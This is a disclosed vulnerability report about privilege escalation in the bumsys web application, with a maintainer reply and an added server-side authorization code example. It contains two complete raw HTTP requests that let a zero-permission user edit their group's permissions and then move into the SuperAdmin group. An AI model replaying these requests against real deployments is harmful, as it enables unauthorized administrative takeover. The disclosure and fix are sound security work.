No permission user can increase his role to administrator in unilogies/bumsys
Reported on
Jan 22nd 2023
Description
No permission user can increase his role to administrator
Proof of Concept
Hey, I am new on this platform :)
Steps:
- Log in to your administrator account, go to People, and create a user with zero permissions (you can create a permission group with zero permissions).
- Then log in to your restricted account; you can use this request from the restricted account to increase your group's permissions:
POST /xhr/?module=settings&page=updategroup HTTP/1.1
Host: demo.bumsys.org
Cookie: eid=4; currencySymbol=%EF%B7%BC; keepAlive=1; __ba188b0713783be306622ba4aefdc4ab41c7280b=20orpb72f8ieakfb6fo1e77382
Content-Length: 731
Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"
X-Csrf-Token: 2414b7867f66c768a2254edeb8f69ce0b3e32f06
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1ceB9wSfSeAkInpk
Accept: */*
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Platform: "macOS"
Origin: https://demo.bumsys.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.bumsys.org/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundary1ceB9wSfSeAkInpk
Content-Disposition: form-data; name="groupName"
Accountant
------WebKitFormBoundary1ceB9wSfSeAkInpk
Content-Disposition: form-data; name="group_id"
2
------WebKitFormBoundary1ceB9wSfSeAkInpk
Content-Disposition: form-data; name="groupPermission[]"
peoples_user.View
------WebKitFormBoundary1ceB9wSfSeAkInpk
Content-Disposition: form-data; name="groupPermission[]"
peoples_user.Add
------WebKitFormBoundary1ceB9wSfSeAkInpk
Content-Disposition: form-data; name="groupPermission[]"
peoples_user.Edit
------WebKitFormBoundary1ceB9wSfSeAkInpk
Content-Disposition: form-data; name="groupPermission[]"
peoples_user.Delete
------WebKitFormBoundary1ceB9wSfSeAkInpk--
- In this request, I added user permissions (edit, delete, view).
- Then you can use this request to increase your role (changing the empGroup parameter, because I am gonna change my group to the SuperAdmin group):
POST /xhr/?module=peoples&page=updateUser HTTP/1.1
Host: demo.bumsys.org
Cookie: eid=4; currencySymbol=%EF%B7%BC; keepAlive=1; __ba188b0713783be306622ba4aefdc4ab41c7280b=20orpb72f8ieakfb6fo1e77382
Content-Length: 964
Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"
X-Csrf-Token: 2414b7867f66c768a2254edeb8f69ce0b3e32f06
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypjBO0WysSRbOfrco
Accept: */*
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Platform: "macOS"
Origin: https://demo.bumsys.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.bumsys.org/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundarypjBO0WysSRbOfrco
Content-Disposition: form-data; name="employeeID"
4
------WebKitFormBoundarypjBO0WysSRbOfrco
Content-Disposition: form-data; name="empGroup"
1
------WebKitFormBoundarypjBO0WysSRbOfrco
Content-Disposition: form-data; name="userHomepage"
------WebKitFormBoundarypjBO0WysSRbOfrco
Content-Disposition: form-data; name="userStatus"
Active
------WebKitFormBoundarypjBO0WysSRbOfrco
Content-Disposition: form-data; name="userName"
testbro
------WebKitFormBoundarypjBO0WysSRbOfrco
Content-Disposition: form-data; name="userEmail"
bruhbey+test@intigriti.me
------WebKitFormBoundarypjBO0WysSRbOfrco
Content-Disposition: form-data; name="userPassword"
------WebKitFormBoundarypjBO0WysSRbOfrco
Content-Disposition: form-data; name="confirmUserPassword"
------WebKitFormBoundarypjBO0WysSRbOfrco
Content-Disposition: form-data; name="user_id"
14
------WebKitFormBoundarypjBO0WysSRbOfrco--
- Change the parameters to your account details (username, email, etc.).
- The id parameters are sequential and easy to guess (user_id, employeeID, etc.).
Btw, I wanna ask a question. Is this a local application? I wanna look for IDORs.
Thanks
Impact
Zero permission user can increase his role to SuperAdmin
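Both requests in the report succeed because the server trusts the submitted group_id, empGroup and user_id values without checking what the calling session is allowed to do with them. The following is an added example, not bumsys code, of the server-side authorization model that closes all three gaps: a capability check on the group editor, a rule that nobody edits their own group or moves themselves to another group, and a rule that a caller may never grant or assign more than they hold (which also makes the sequential user_id values harmless). The permission strings and ids come from the report; the group-management permission name, class names and fixture are assumptions.

```python
# Added example (not bumsys code): server-side authorization checks for the
# settings/updategroup and peoples/updateUser handlers abused in the report.
from dataclasses import dataclass, field

# Permission strings as they appear in the report's first request.
PEOPLE_PERMS = {"peoples_user.View", "peoples_user.Add",
                "peoples_user.Edit", "peoples_user.Delete"}
GROUP_EDIT_PERM = "settings_group.Edit"   # hypothetical name, not on the page
ALL_PERMS = PEOPLE_PERMS | {GROUP_EDIT_PERM}


class Forbidden(Exception):
    """The caller's permissions do not allow the requested change (HTTP 403)."""


@dataclass
class Group:
    group_id: int
    name: str
    permissions: set = field(default_factory=set)


@dataclass
class User:
    user_id: int
    group_id: int


class AuthzStore:
    def __init__(self, groups, users):
        self.groups = {g.group_id: g for g in groups}
        self.users = {u.user_id: u for u in users}

    def perms_of(self, user_id):
        return self.groups[self.users[user_id].group_id].permissions

    def update_group(self, actor_id, group_id, new_perms):
        """Checks the report's updategroup request was missing."""
        actor_perms = self.perms_of(actor_id)
        new_perms = set(new_perms)
        # 1. Capability: only group managers may touch permission sets at all.
        if GROUP_EDIT_PERM not in actor_perms:
            raise Forbidden("updategroup requires " + GROUP_EDIT_PERM)
        # 2. No self-service: editing one's own group changes one's own rights.
        if self.users[actor_id].group_id == group_id:
            raise Forbidden("cannot edit own group")
        # 3. No privilege laundering: a caller may grant only what they hold.
        extra = new_perms - actor_perms
        if extra:
            raise Forbidden("cannot grant: " + ", ".join(sorted(extra)))
        self.groups[group_id].permissions = new_perms

    def update_user(self, actor_id, user_id, new_group_id):
        """Checks the report's updateUser request was missing, including the
        object-level check that defeats guessing sequential user_id values."""
        actor_perms = self.perms_of(actor_id)
        target = self.users[user_id]   # unknown id -> KeyError, a 404 in a handler
        # Object-level authorization: editing someone else needs peoples_user.Edit.
        if actor_id != user_id and "peoples_user.Edit" not in actor_perms:
            raise Forbidden("updateUser on another user requires peoples_user.Edit")
        # A caller may not touch a user who already outranks them.
        if not self.groups[target.group_id].permissions <= actor_perms:
            raise Forbidden("target user has more permissions than the caller")
        if new_group_id != target.group_id:
            # Nobody moves themselves to another group through this endpoint.
            if actor_id == user_id:
                raise Forbidden("cannot change own group")
            # Even group managers may not place a user above their own level.
            if not self.groups[new_group_id].permissions <= actor_perms:
                raise Forbidden("target group exceeds the caller's permissions")
        target.group_id = new_group_id


def build_sample_store():
    """Constructed fixture mirroring the report: group 1 = SuperAdmin, group 2 =
    'Accountant' with zero permissions, user 14 (the restricted account) in group 2."""
    return AuthzStore(
        groups=[Group(1, "SuperAdmin", set(ALL_PERMS)), Group(2, "Accountant", set())],
        users=[User(1, 1), User(14, 2)],
    )


def replay_report(store=None):
    """Replay the report's two requests as user 14 against the checked handlers.
    Returns (refusal messages, final group of user 14)."""
    store = store or build_sample_store()
    refused = []
    for step in (lambda: store.update_group(14, 2, PEOPLE_PERMS),
                 lambda: store.update_user(14, 14, 1)):
        try:
            step()
        except Forbidden as exc:
            refused.append(str(exc))
    return refused, store.users[14].group_id


if __name__ == "__main__":
    print(replay_report())   # both steps refused, user 14 stays in group 2
```

The same store still lets the administrator do the legitimate version of both operations (grant group 2 the people permissions, then move user 14), because the SuperAdmin group holds every permission and so passes the subset checks; the checks only bite when the caller asks for more than they have.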
Occurrences
SECURITY.md (exists, 10 months ago)
Hello @bruhbey, very good finding. Please note, we are currently working on the security, and we have not released any stable release yet.